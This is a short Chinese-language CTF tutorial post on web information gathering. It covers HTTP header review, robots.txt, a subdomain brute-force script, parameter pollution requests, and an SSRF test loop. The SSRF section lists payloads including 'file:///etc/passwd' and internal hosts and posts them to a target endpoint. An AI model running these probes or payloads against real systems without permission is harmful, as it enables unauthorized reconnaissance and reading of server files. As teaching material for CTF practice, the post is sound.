ctf web 信息收集
时间: 2025-02-08 16:36:15 浏览: 43
### CTF Web 安全中的信息收集技巧与工具
#### HTTP头部信息分析
HTTP请求和响应头包含了大量关于目标系统的有用信息。通过仔细审查这些头部字段,可以发现潜在的安全弱点或配置错误[^4]。
```http
GET / HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,*/*;
Connection: close
```
#### Robots.txt 文件解析
许多网站会维护一个`robots.txt`文件来指导搜索引擎的行为。这个文件不仅限于阻止访问某些路径,有时也会无意间暴露重要的目录结构或其他敏感资源位置。
```bash
curl http://example.com/robots.txt
```
#### 子域名枚举
子域查找对于扩大攻击面至关重要。可以通过在线服务、DNS查询以及字典暴力破解等方式来进行有效的子域名挖掘工作。
```python
import requests
def enumerate_subdomains(domain, wordlist_file='subdomains.txt'):
with open(wordlist_file) as f:
names = f.read().splitlines()
found = []
for name in names:
try:
response = requests.get(f"http://{name}.{domain}")
if response.status_code == 200:
found.append(name)
except Exception as e:
continue
return found
```
#### 参数污染测试
当应用程序未能正确处理多个同名参数时可能会引发逻辑缺陷甚至命令注入等问题。尝试向URL附加额外的参数并观察其行为变化可以帮助识别此类漏洞的存在。
```http
POST /login.php?username=admin&password=pass&action=login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
username=admin&password=pass&action=logout&action=login
```
#### SSRF 攻击检测
服务器端请求伪造(Server-Side Request Forgery, SSRF)允许攻击者诱使受害者的服务器发起恶意构建的内部网络请求。这通常用于绕过防火墙限制从而获取内网资产详情或者执行进一步的操作如读取本地文件等[^2]。
```python
payloads = [
"http://localhost",
"file:///etc/passwd",
"//internal-service.local"
]
for payload in payloads:
r = requests.post(url="http://vulnerable-site.com/ssrf-endpoint", data={"url": payload})
print(r.text)
```
阅读全文
相关推荐
















